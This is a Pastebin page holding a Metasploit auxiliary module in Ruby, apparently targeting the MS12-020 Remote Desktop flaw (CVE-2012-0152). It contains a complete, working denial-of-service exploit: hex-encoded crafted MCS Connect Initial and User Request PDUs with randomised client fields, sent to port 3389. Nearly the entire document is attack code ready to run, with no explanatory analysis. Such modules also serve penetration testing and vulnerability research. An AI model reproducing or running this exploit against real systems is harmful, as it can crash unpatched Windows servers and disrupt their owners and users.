Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- class Metasploit3 < Msf::Auxiliary
- include Msf::Exploit::Remote::Tcp
- include Msf::Auxiliary::Dos
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'ms12-020',
- 'Description' => %q{
- MS12-020
- },
- 'Author' => [ 'a.maloteaux' ],
- 'License' => MSF_LICENSE,
- 'Version' => '$Revision: 14976 $',
- 'References' =>
- [
- [ 'CVE', '2012-0152' ],
- [ 'MSB', 'MS12-020'],
- [ 'OSVDB', '80004' ],
- [ 'URL', 'http://stratsec.blogspot.com.au/2012/03/ms12-020-vulnerability-for-breakfast.html' ],
- ],
- 'DisclosureDate' => 'Mar 03 2012'))
- register_options(
- [
- Opt::RPORT(3389)
- ], self.class )
- end
- def run
- client_name = ::Rex::Text::to_unicode(::Rex::Text::rand_text_alphanumeric(15 - rand(10)).ljust(16,"\x00"), 'utf-16le')
- client_product_id = "#{::Rex::Text::rand_text_numeric(5)}-#{::Rex::Text::rand_text_numeric(3)}-#{::Rex::Text::rand_text_numeric(7)}-#{::Rex::Text::rand_text_numeric(5)}"
- client_product_id = ::Rex::Text::to_unicode(client_product_id.ljust(32,"\x00"))
- payload = "030000130EE000000000000100080000000000".to_a.pack("H*")
- #MCS Connect Initial PDU with GCC Conference Create Request
- payload << "030001a002f0807f6582019404010104".to_a.pack("H*")
- payload << "01010101ff3019".to_a.pack("H*")
- payload << "020100".to_a.pack("H*") #ChannelIds = 0
- payload << "020102020100".to_a.pack("H*")
- payload << "0201010201000201010202ffff020102".to_a.pack("H*")
- payload << "30190201010201010201010201010201".to_a.pack("H*")
- payload << "0002010102020420020102301c0202ff".to_a.pack("H*")
- payload << "ff0202fc170202ffff02010102010002".to_a.pack("H*")
- payload << "01010202ffff02010204820133000500".to_a.pack("H*")
- payload << "147c0001812a000800100001c0004475".to_a.pack("H*")
- payload << "6361811c01c0d8000400080000050004".to_a.pack("H*")
- payload << "01ca03aa09040000ce0e0000".to_a.pack("H*")
- payload << client_name
- payload << "04000000".to_a.pack("H*")
- payload << "000000000c0000000000000000000000".to_a.pack("H*")
- payload << "00000000000000000000000000000000".to_a.pack("H*")
- payload << "00000000000000000000000000000000".to_a.pack("H*")
- payload << "00000000000000000000000000000000".to_a.pack("H*")
- payload << "000000000000000001ca010000000000".to_a.pack("H*")
- payload << "180007000100".to_a.pack("H*")
- payload << client_product_id
- payload << "00000000000004c00c00".to_a.pack("H*")
- payload << "0d0000000000000002c00c001b000000".to_a.pack("H*")
- payload << "0000000003c02c000300000072647064".to_a.pack("H*")
- payload << "7200000000008080636c697072647200".to_a.pack("H*")
- payload << "0000a0c0726470736e640000000000c0".to_a.pack("H*")
- #User Request PDU
- payload << "0300000802f08028".to_a.pack("H*")
- begin
- connect
- sock.put(payload)
- Kernel.select(nil, nil, nil, 2)
- rescue
- print_error("Server not available")
- end
- end
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement